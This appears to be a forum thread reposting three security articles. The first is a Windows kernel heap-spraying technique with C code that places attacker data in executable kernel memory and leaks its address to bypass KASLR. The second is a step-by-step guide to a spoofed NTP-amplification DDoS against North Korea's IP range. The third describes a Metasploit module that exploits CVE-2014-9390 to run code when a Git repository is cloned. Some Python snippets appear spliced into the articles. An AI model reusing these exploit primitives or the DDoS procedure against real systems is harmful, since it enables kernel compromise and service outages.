22. [h=2]Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool[/h] [h=2]The State of Kernel Exploitation[/h] The typical write-what-where kernel-mode exploit technique relies on either modifying some key kernel-mode data structure, which is easy to do locally on Windows thanks to poor Kernel Address Space Layout Randomization (KASLR), or on redirecting execution to a controlled user-mode address, which will then run with Ring 0 rights. Relying on a user-mode address is an easy way not to worry about the kernel address space, and to have full control of the code within a process. Editing the tagWND structure or the HAL Dispatch Table are two very common vectors, as are many others. However, with Supervisor Mode Execution Prevention (SMEP), also called Intel OS Guard, this technique is no longer reliable — a direct user-mode address cannot be used, and other techniques must be employed instead. One possibility is to disable SMEP enforcement in the CR4 register through Return-Oriented Programming, or ROP, if stack control is possible. This has been covered in a few papers and presentations. Another related possibility is to disable SMEP enforcement on a per-page basis — taking a user-mode page and marking it as a kernel page by making the required changes in the page level translation mapping entries. This has also been discussed in at least one presentation, and, if accepted, a future SyScan 2015 talk from a friend of mine will also cover this technique. Additionally, if accepted, an alternate version of the technique will be presented at INFILTRATE 2015, by yours truly. Finally, a theoretical possibility is being able to transfer execution (through a pointer, callback table, etc) to an existing function that disables SMEP (and thus bypassing KASLR), but then somehow continues to give the attacker control without ROP — nobody has yet found such a function. This would be a type of Jump-Oriented Programming (JOP) attack.
Nonetheless, all of these techniques continue to leverage a user-mode address as the main payload (nothing wrong with that). However, one must also consider the possibility of using a kernel-mode address for the attack, which means that no ROP and/or PTE hacking is needed to disable SMEP in the first place. Obviously, this means that the function to perform the malicious payload’s work already exists in the kernel, or we have a way of bringing it into the kernel. In the case of a stack/pool overflow, this payload probably already comes with the attack, and the usual tricks have been employed there in order to get code execution. Such attacks are particularly common in true ‘remote-remote’ attacks. But what of write-what-where bugs, usually the domain of the local (or remote-local) attacker? If we have user-mode code execution available to us, to execute the write-what-where, we can obviously continue using the write-what-where exploit to repeatedly fill an address of our choice with the payload data. This presents a few problems, however:

The write-what-where may be unreliable, or corrupt adjacent data. This makes it hard to use it to ‘fill’ memory with code.

It may not be obvious where to write the code — having to deal with KASLR as well as Kernel NX. On Windows, this is not terribly hard, but it should be recognized as a barrier nonetheless.

This blog post introduces what I believe to be two new techniques: a generic kernel-mode heap spraying technique which results in executable memory, followed by a generic kernel-mode heap address discovery technique, bypassing KASLR. [h=2]Big Pool[/h] Experts of the Windows heap manager (called the pool) know that there are two different allocators (three, if you’re being pedantic): the regular pool allocator (which can use lookaside lists that work slightly differently than regular pool allocations), and the big/large page pool allocator.
The regular pool is used for any allocations that fit within a page, so either 4080 bytes on x86 (8 bytes for the pool header, and 8 bytes used for the initial free block), or 4064 bytes on x64 (16 bytes for the pool header, 16 bytes used for the initial free block). The tracking, mapping, and accounting of such allocations is handled as part of the regular slush of kernel-mode memory that the pool manager owns, and the pool headers link everything together. Big pool allocations, on the other hand, take up one or more pages. They’re used for anything over the sizes above, as well as when the CacheAligned type of pool memory is used, regardless of the requested allocation size — there’s no way to easily guarantee cache alignment without dedicating a whole page to an allocation. Because there’s no room for a header, these pages are tracked in a separate “Big Pool Tracking Table” (nt!PoolBigPageTable), and the pool tags, which are used to identify the owner of an allocation, are also not present in the header (since there isn’t one!), but rather in the table as well. Each entry in this table is represented by a POOL_TRACKER_BIG_PAGES structure, documented in the public symbols:

[TABLE]
[TR]
[TD=class: line_numbers]1 2 3 4 5 [/TD]
[TD=class: code]lkd> dt nt!_POOL_TRACKER_BIG_PAGES
   +0x000 Va            : Ptr32 Void
   +0x004 Key           : Uint4B
   +0x008 PoolType      : Uint4B
   +0x00c NumberOfBytes : Uint4B[/TD]
[/TR]
[/TABLE]

One thing to be aware of is that the Virtual Address (Va) is OR’ed with a bit to indicate if the allocation is freed or allocated — in other words, you may have duplicate Va’s, some freed, and at most one allocated. The following simple WinDBG script will dump all the big pool allocations for you:

[TABLE]
[TR]
[TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 [/TD]
[TD=class: code]r? @$t0 = (nt!_POOL_TRACKER_BIG_PAGES*)@@(poi(nt!PoolBigPageTable))
r? @$t1 = *(int*)@@(nt!PoolBigPageTableSize) / sizeof(nt!_POOL_TRACKER_BIG_PAGES)
.for (r @$t2 = 0; @$t2 < @$t1; r? @$t2 = @$t2 + 1)
{
    r? @$t3 = @$t0[@$t2];
    .if (@@(@$t3.Va != 1))
    {
        .printf "VA: 0x%p Size: 0x%lx Tag: %c%c%c%c Freed: %d Paged: %d CacheAligned: %d\n", @@((int)@$t3.Va & ~1), @@(@$t3.NumberOfBytes), @@(@$t3.Key >> 0 & 0xFF), @@(@$t3.Key >> 8 & 0xFF), @@(@$t3.Key >> 16 & 0xFF), @@(@$t3.Key >> 24 & 0xFF), @@((int)@$t3.Va & 1), @@(@$t3.PoolType & 1), @@(@$t3.PoolType & 4) == 4
    }
}[/TD]
[/TR]
[/TABLE]

Why are big pool allocations interesting? Unlike small pool allocations, which can share pages, and are hard to track for debugging purposes (without dumping the entire pool slush), big pool allocations are easy to enumerate. So easy, in fact, that the undocumented KASLR-be-damned API NtQuerySystemInformation has an information class specifically designed for dumping big pool allocations. Including not only their size, their tag, and their type (paged or nonpaged), but also their kernel virtual address! As previously presented, this API requires no privileges, and only in Windows 8.1 has it been locked down against low integrity callers (Metro/Sandboxed applications). With the little snippet of code below, you can easily enumerate all big pool allocations:

[TABLE]
[TR]
[TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [/TD]
[TD=class: code]//
// Note: This is poor programming (hardcoding 4MB).
// The correct way would be to issue the system call
// twice, and use the resultLength of the first call
// to dynamically size the buffer to the correct size
//
bigPoolInfo = RtlAllocateHeap(RtlGetProcessHeap(),
                              0,
                              4 * 1024 * 1024);
if (bigPoolInfo == NULL) goto Cleanup;

res = NtQuerySystemInformation(SystemBigPoolInformation,
                               bigPoolInfo,
                               4 * 1024 * 1024,
                               &resultLength);
if (!NT_SUCCESS(res)) goto Cleanup;

printf("TYPE ADDRESS\tBYTES\tTAG\n");
for (i = 0; i < bigPoolInfo->Count; i++)
{
    printf("%s0x%p\t0x%lx\t%c%c%c%c\n",
           bigPoolInfo->AllocatedInfo[i].NonPaged == 1 ?
           "Nonpaged " : "Paged ",
           bigPoolInfo->AllocatedInfo[i].VirtualAddress,
           bigPoolInfo->AllocatedInfo[i].SizeInBytes,
           bigPoolInfo->AllocatedInfo[i].Tag[0],
           bigPoolInfo->AllocatedInfo[i].Tag[1],
           bigPoolInfo->AllocatedInfo[i].Tag[2],
           bigPoolInfo->AllocatedInfo[i].Tag[3]);
}

Cleanup:
if (bigPoolInfo != NULL)
{
    RtlFreeHeap(RtlGetProcessHeap(), 0, bigPoolInfo);
}[/TD]
[/TR]
[/TABLE]

[h=2]Pool Control[/h] Obviously, it’s quite useful to have all these handy kernel-mode addresses. But what can we do to control their data, and not only be able to read their address? You may be aware of previous techniques where a user-mode attacker allocates a kernel object (say, an APC Reserve Object), which has a few fields that are user-controlled, and which then has an API to get its kernel-mode address. We’re essentially going to do the same here, but rely on more than just a few fields. Our goal, therefore, is to find a user-mode API that can give us full control over the kernel-mode data of a kernel object, and additionally, to result in a big pool allocation. This isn’t as hard as it sounds: anytime a kernel-mode component allocates over the limits above, a big pool allocation is done instead. Therefore, the exercise reduces itself to finding a user-mode API that can result in a kernel allocation of over 4KB, whose data is controlled. And since Windows XP SP2 and later enforce kernel-mode non-executable memory, the allocation should be executable as well. Two easy examples may pop up in your head:

1. Creating a local socket, listening to it, connecting from another thread, accepting the connection, and then issuing a write of > 4KB of socket data, but not reading it. This will result in the Ancillary Function Driver for WinSock (AFD.SYS), also affectionately known as “Another F*cking Driver”, allocating the socket data in kernel-mode memory.
Because the Windows network stack functions at DISPATCH_LEVEL (IRQL 2), and paging is not available, AFD will use a nonpaged pool buffer for the allocation. This is great, because until Windows 8, nonpaged pool is executable!

2. Creating a named pipe, and issuing a write of > 4KB of data, but not reading it. This will result in the Named Pipe File System (NPFS.SYS) allocating the pipe data in a nonpaged pool buffer as well (because NPFS performs buffer management at DISPATCH_LEVEL as well).

Ultimately, #2 is a lot easier, requiring only a few lines of code, and being much less conspicuous than using sockets. The important thing you have to know is that NPFS will prefix our buffer with its own internal header, which is called a DATA_ENTRY. Each version of NPFS has a slightly different size (XP- vs 2003+ vs Windows 8+). I’ve found that the cleanest way to handle this, and not to worry about offsets in the final kernel payload, is to handle this internally in the user-mode buffer with the right offsets. And finally, remember that the key here is to have a buffer that’s at least the size of a page, so we can force the big pool allocator. Here’s a little snippet that takes all this into account and will have the desired effects:

[TABLE]
[TR]
[TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [/TD]
[TD=class: code]UCHAR payLoad[PAGE_SIZE - 0x1C + 44];

//
// Fill the first page with 0x41414141, and the next page
// with INT3's (simulating our payload). On x86 Windows 7
// the size of a DATA_ENTRY is 28 bytes (0x1C).
//
RtlFillMemory(payLoad, PAGE_SIZE - 0x1C, 0x41);
RtlFillMemory(payLoad + PAGE_SIZE - 0x1C, 44, 0xCC);

//
// Write the data into the kernel
//
res = CreatePipe(&readPipe,
                 &writePipe,
                 NULL,
                 sizeof(payLoad));
if (res == FALSE) goto Cleanup;
res = WriteFile(writePipe,
                payLoad,
                sizeof(payLoad),
                &resultLength,
                NULL);
if (res == FALSE) goto Cleanup;

//
// extra code goes here...
//

Cleanup:
CloseHandle(writePipe);
CloseHandle(readPipe);[/TD]
[/TR]
[/TABLE]

Now all we need to know is that NPFS uses the pool tag ‘NpFr’ for the read data buffers (you can find this out by using the !pool and !poolfind commands in WinDBG). We can then change the earlier KASLR-defeating snippet to hard-code the pool tag and expected allocation size, and we can instantly find the kernel-mode address of our buffer, which will fully match our user-mode buffer. Keep in mind that the “Paged vs. Nonpaged” flag is OR’ed into the virtual address (this is different from the structure in the kernel, which tracks free vs. allocated), so we’ll mask that out, and also make sure you align the size to the pool header alignment (it’s enforced even for big pool allocations). Here’s that snippet, for x86 Windows:

[TABLE]
[TR]
[TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [/TD]
[TD=class: code]//
// Based on pooltag.txt, we're looking for the following:
// NpFr - npfs.sys - DATA_ENTRY records (r/w buffers)
//
for (entry = bigPoolInfo->AllocatedInfo;
     entry < (PSYSTEM_BIGPOOL_ENTRY)bigPoolInfo +
             bigPoolInfo->Count;
     entry++)
{
    if ((entry->NonPaged == 1) &&
        (entry->TagUlong == 'rFpN') &&
        (entry->SizeInBytes == ALIGN_UP(PAGE_SIZE + 44, ULONGLONG)))
    {
        printf("Kernel payload @ 0x%p\n",
               (ULONG_PTR)entry->VirtualAddress & ~1 + PAGE_SIZE);
        break;
    }
}[/TD]
[/TR]
[/TABLE]

And here’s the proof in WinDBG: Voila! Package this into a simple “kmalloc” helper function, and now you too can allocate executable, kernel-mode memory, at a known address! How big can these allocations get? I’ve gone up to 128MB without a problem, but this being nonpaged pool, make sure you have the RAM to handle it. Here’s a link to some sample code which implements exactly this functionality. An additional benefit of this technique is that not only can you get the virtual address of your allocation, you can even get the physical address!
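Why does the snippet compare TagUlong against 'rFpN' when the NPFS tag is 'NpFr'? Because the four tag bytes are stored in memory in order, and reading them back as one little-endian 32-bit integer reverses them; the MSVC multi-character constant 'rFpN' evaluates to exactly that integer. A quick Python check of the encoding (an illustration, not part of the original code):

```python
import struct

# The four ASCII tag bytes exactly as NPFS writes them into the
# big pool tracker table.
tag_bytes = b'NpFr'

# Read back as a little-endian 32-bit integer -- this is what the
# TagUlong field holds on x86/x64.
tag_ulong = struct.unpack('<I', tag_bytes)[0]
print(hex(tag_ulong))  # → 0x7246704e

# Written back out big-endian, the integer spells the reversed tag,
# which is what the C character constant 'rFpN' evaluates to under MSVC.
assert struct.pack('>I', tag_ulong) == b'rFpN'
```

The same trick applies to any pool tag comparison done against the raw 32-bit Key/TagUlong field rather than the individual bytes.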
Indeed, as part of the undocumented Superfetch API that I first discovered and implemented in my meminfo tool, which has now been supplanted by the RAMMap utility from SysInternals, the memory manager will happily return the pool tag, virtual address, and physical address of our allocation. Here’s a screenshot of RAMMap showing another payload allocation and its corresponding physical address (note that the 0x1000 difference is because the command-line PoC biases the pointer, as you saw in the code). [h=2]Next Steps[/h] Now, for full disclosure, there are a few additional caveats that make this technique a bit less sexy in 2015 — and why I chose to talk about it today, and not 8 years ago when I first stumbled upon it:

1) Starting with Windows 8, nonpaged pool allocations are now non-executable. This means that while this trick still lets you spray the pool, your code will require some sort of NX bypass first. So you’ve gone from bypassing SMEP to bypassing kernel-mode NX.

2) In Windows 8.1, the API to get the big pool entries and their addresses is no longer usable by low-integrity callers. This significantly reduces the usefulness in local-remote attacks, since those are usually launched through sandboxed applications (Flash, IE, Chrome, etc) and/or Metro containers.

Of course, there are some ways around this — a sandbox escape is often used in local-remote attacks anyway, so #2 can become moot. As for #1, some astute researchers have already figured out that NX was not fully deployed — for example, Session Pool allocations are STILL executable on newer versions of Windows, but only on x86 (32-bit). I leave it as an exercise to readers to figure out how this technique can be extended to leverage that (hint: there’s a ‘Big Session Pool’). But what about a modern, 64-bit version of Windows, say even Windows 10? Well, this technique appears to be mostly dead on such systems — or does it?
Is everything truly NX in the kernel, or are there still some sneaky ways to get some executable memory, and to get its address? I’ll be sure to blog about it once Windows 14 is out the door in 2022. © Alex Ionescu Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool « Alex Ionescu’s Blog
23. [h=3]Anybody can take North Korea offline[/h] By Robert Graham A couple of days after the FBI blamed the Sony hack on North Korea, that country went offline. Many suspected the U.S. government, but the reality is that anybody can do it -- even you. I mention this because of a Vox.com story that claims "There is no way that Anonymous pulled off this scale of an attack on North Korea". That's laughably wrong, overestimating the scale of North Korea's Internet connection, and underestimating the scale of Anonymous's capabilities. North Korea has a roughly ~10-gbps link to the Internet for its IP addresses. That's only about ten times what Google Fiber provides. In other words, 10 American households can have as much bandwidth as the entire country. Anonymous's capabilities exceed this, scaling past 1-terabit/second, or a hundred times more than needed to take down North Korea. Attacks are made easier due to amplifiers on the Internet, which can increase the level of traffic by about 100 times. Thus, in order to overload a 10-gbps link of your target, you only need a 100-mbps link yourself. This is well within the capabilities of a single person. Such attacks are difficult to do from your home, because your network connection is asymmetric. A 100-mbps connection from Comcast refers to the download speed -- it's only about 20-mbps in the other direction. You'll probably need to use web host services that sell high upload speed. You can cheaply get a 100-mbps or even 1-gbps upload connection for about $30 per month in bitcoin. You'll need to find one that doesn't do egress filtering, because you'll be spoofing North Korea's addresses, but that's rarely a problem. You need some familiarity with command-line tools. In this age of iPads, the command-line seems like Dark Magic to some people, but it's something all computer geeks use regularly. Thus, to do these attacks, you'll need some basic geek skills, but they are something that can be acquired in a week.
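The back-of-the-envelope numbers above are easy to verify. A small Python sketch using the article's rough figures (~10 Gbps target link, ~100x NTP amplification, ~20 Mbps typical home upload):

```python
# Back-of-the-envelope DDoS amplification math, using the article's
# rough figures (all values are approximations from the text).
target_link_bps = 10e9   # North Korea's ~10 Gbps uplink
amplification = 100      # rough amplification factor for NTP monlist

# Attacker upload bandwidth needed to saturate the target link:
needed_bps = target_link_bps / amplification
print(f"{needed_bps / 1e6:.0f} Mbps needed")  # → 100 Mbps needed

# A typical asymmetric home connection (~20 Mbps up) falls short,
# which is why the article suggests renting a server with fast upload.
home_upload_bps = 20e6
print(needed_bps <= home_upload_bps)  # → False
```

This is the whole argument in two divisions: with a 100x amplifier, a single rented 100 Mbps uplink is enough to fill the country's entire 10 Gbps pipe.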
How I would do it is roughly shown by the following command-line command. This uses some software I wrote for port-scanning, but as a side effect, it can also be used for these sorts of "amplified DDoS" attacks. What we see in this command-line is the following:

use spoofing as part of the attack
targeting the North Korean IP addresses around 175.45.176.0
bouncing the packets off a list of amplifiers
building a custom NTP monlist packet that causes amplification
sending to port 123 (NTP)
sending at a rate of one million packets/second
repeating the attack infinitely (never stopping)

For this attack to work, you'll need a list of amplifiers. You can find these lists in hacker forums, or you can just find the amplifiers yourself using masscan (after all, that's what port scanners are supposed to do). I use masscan in my example because it's my tool, so it's how I'd do it, but no special tool is needed. You can write your own code to do it pretty easily, and there are tons of other tools that can be configured to do this. I stress this because people have this belief in the power of cyberweapons, that powerful effects like disabling a country can't happen without powerful weapons. This belief is nonsense. It's unknown if Anonymous hackers actually DDoSed North Korea, like the "Lizard Squad" that claims responsibility, but it's easily within their capabilities. What's actually astonishing, given that millions of people can so easily DDoS North Korea, is that it doesn't happen more often. Note: This only takes down one aspect of the North Korean Internet. Satellite links, other telephony links, cell phones, and the ".kp" domain names would still be unaffected. It would take some skill to attack all those possibilities, but it appears that the hackers only did the simple DDoS. Sursa: Errata Security: Anybody can take North Korea offline
  24. Umflatu'
25. [h=1]12 Days of HaXmas: Exploiting CVE-2014-9390 in Git and Mercurial[/h]Posted by jhart in Metasploit on Jan 1, 2015 2:18:22 PM This post is the eighth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014. A week or two back, Mercurial inventor Matt Mackall found what ended up being filed as CVE-2014-9390. While the folks behind CVE are still publishing the final details, Git clients (before versions 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial clients (before version 3.2.3) contained three vulnerabilities that allowed malicious Git or Mercurial repositories to execute arbitrary code on vulnerable clients under certain circumstances. To understand these vulnerabilities and their impact, you must first understand a few basic things about Git and Mercurial clients. Under the hood, a Git or Mercurial repository on disk is really just a directory. In this directory is another specially named directory (.git for Git, .hg for Mercurial) that contains all of the configuration files and metadata that makes up the repository. Everything else outside of this special directory is just a pile of files and directories, often called the working directory, written to disk based on the previously mentioned metadata. So, in a way, if you had a Git repository called Test, Test/.git is the repository and everything else under the Test directory is simply a working copy of the files contained in the repository at a particular point in time. A nearly identical concept also exists in Mercurial. Here is a quick example of a simple Git repository that has no files committed to it. As you can see, even this empty repository has a fair amount of metadata and a number of configuration files:

$ git init foo
$ tree -a foo
foo
└── .git
    ├── branches
    ├── config
    ├── description
    ├── HEAD
    ├── hooks
    │   ├── applypatch-msg.sample
    │   ├── commit-msg.sample
    │   ├── post-update.sample
    │   ├── pre-applypatch.sample
    │   ├── pre-commit.sample
    │   ├── prepare-commit-msg.sample
    │   ├── pre-rebase.sample
    │   └── update.sample
    ├── info
    │   └── exclude
    ├── objects
    │   ├── info
    │   └── pack
    └── refs
        ├── heads
        └── tags

If you then add a single file to it called test.txt, you can see how the directory starts to change as the raw objects are added to the .git/objects directory:

$ cd foo
$ date > test.txt && git add test.txt && git commit -m "Add test.txt" -a
[master (root-commit) fb19d8e] Add test.txt
 1 file changed, 1 insertion(+)
 create mode 100644 test.txt
$ git log
commit fb19d8e1e5db83b4b11bbd7ed91e1120980a38e0
Author: Jon Hart
Date: Wed Dec 31 09:08:41 2014 -0800

    Add test.txt

$ tree -a .
.
├── .git
│   ├── branches
│   ├── COMMIT_EDITMSG
│   ├── config
│   ├── description
│   ├── HEAD
│   ├── hooks
│   │   ├── applypatch-msg.sample
│   │   ├── commit-msg.sample
│   │   ├── post-update.sample
│   │   ├── pre-applypatch.sample
│   │   ├── pre-commit.sample
│   │   ├── prepare-commit-msg.sample
│   │   ├── pre-rebase.sample
│   │   └── update.sample
│   ├── index
│   ├── info
│   │   └── exclude
│   ├── logs
│   │   ├── HEAD
│   │   └── refs
│   │       └── heads
│   │           └── master
│   ├── objects
│   │   ├── 1c
│   │   │   └── 8fe13acf2178ea5130480625eef83a59497cb0
│   │   ├── 4b
│   │   │   └── 825dc642cb6eb9a060e54bf8d69288fbee4904
│   │   ├── e5
│   │   │   └── 58a44cf7fca31e7ae5f15e370e9a35bd1620f7
│   │   ├── fb
│   │   │   └── 19d8e1e5db83b4b11bbd7ed91e1120980a38e0
│   │   ├── info
│   │   └── pack
│   └── refs
│       ├── heads
│       │   └── master
│       └── tags
└── test.txt

Similarly, for Mercurial:

$ hg init blah
$ tree -a blah
blah
└── .hg
    ├── 00changelog.i
    ├── requires
    └── store

2 directories, 2 files

$ cd blah
$ date > test.txt && hg add test.txt && hg commit -m "Add test.txt"
$ hg log
changeset: 0:ea7dac4a11f0
tag: tip
user: Jon Hart
date: Wed Dec 31 09:25:07 2014 -0800
summary: Add test.txt

$ tree -a .
.
├── .hg
│   ├── 00changelog.i
│   ├── cache
│   │   └── branch2-served
│   ├── dirstate
│   ├── last-message.txt
│   ├── requires
│   ├── store
│   │   ├── 00changelog.i
│   │   ├── 00manifest.i
│   │   ├── data
│   │   │   └── test.txt.i
│   │   ├── fncache
│   │   ├── phaseroots
│   │   ├── undo
│   │   └── undo.phaseroots
│   ├── undo.bookmarks
│   ├── undo.branch
│   ├── undo.desc
│   └── undo.dirstate
└── test.txt

These directories (.git, .hg) are created by a client when the repository is initially created or cloned. The contents of these directories can be modified by users to, for example, configure repository options (.git/config for Git, .hg/hgrc for Mercurial), and are routinely modified by Git and Mercurial clients as part of normal operations on the repository. Simplified, the .hg and .git directories contain everything necessary for the repository to operate, and everything outside of these directories is considered part of the working directory, namely the contents of the repository itself (test.txt in my simplified examples). Want to learn more? Git Basics and Understanding Mercurial are great resources. During routine repository operations such as cloning, updating, committing, etc, the repository working directory is updated to reflect the current state of the repository. Using the examples from above, upon cloning either of these repositories, the local clone of the repository would be updated to reflect the current state of test.txt. This is where the trouble begins. Both Git and Mercurial clients have long had code that ensures that no commits are made to anything in the .git or .hg directories. Because these directories control client-side behavior of a Git or Mercurial repository, if they were not protected, a Git or Mercurial server could potentially manipulate the contents of certain sensitive files in the repository that could cause unexpected behavior when a client performs certain operations on the repository. Unfortunately, these sensitive directories were not properly protected in all cases.
Specifically:

- On operating systems with case-insensitive file systems, such as Windows and OS X, Git clients (before versions 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) can be convinced to retrieve and overwrite sensitive configuration files in the .git directory, which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. While a commit to a file under .git (all lower case) would be blocked, a commit to .giT (mixed case) would not be, and would result in .git being modified, because .giT is equivalent to .git on a case-insensitive file system.
- These same Git clients, as well as Mercurial versions before 3.2.3, have a nearly identical vulnerability affecting HFS+ file systems (OS X), where certain Unicode codepoints are ignored in file names.
- Mercurial before 3.2.3 has a nearly identical vulnerability on Windows only, where MS-DOS file "short names" (the 8.3 format) are possible.

Basic exploitation of the first vulnerability is fairly simple to do with basic Git commands, as I described in #4435, and the commits that fix the second and third vulnerabilities show simple examples of how to exploit them. But basic exploitation is boring, so in #4440 I've spiced things up a bit. As currently written, this module exploits the first of these three vulnerabilities by launching an HTTP server designed to simulate a Git repository accessed over HTTP, which is one of the most common ways to interact with Git. Upon cloning this repository, vulnerable clients will be convinced to overwrite Git hooks, which are shell scripts that get executed when certain operations happen (committing, updating, checkout, etc).
By default, this module overwrites the .git/hooks/post-checkout script, which is executed upon completion of a checkout. Conveniently, a checkout happens at clone time, so the simple act of cloning a repository can allow arbitrary code execution on the Git client. The module goes a little bit further and serves some simplistic HTML in the hopes of luring in potentially vulnerable clients. And, if you clone it, it only looks mildly suspicious:

$ git clone http://10.0.1.18:8080/ldf.git
Cloning into 'ldf'...
$ cd ldf
$ git log
commit 858597e39d8a5d8e3511d404bcb210948dc835ae
Author: Deborah Phillips
Date:   Thu Apr 29 17:44:02 2004 -0500

    Initial commit to open git repository for nf.tygzxwf.xnk0lycynl.org!

The module has the beginnings of support for the second and third vulnerabilities, so this particular #haxmas gift may need some work by you, the Metasploit community. Enjoy!

Sursa: https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial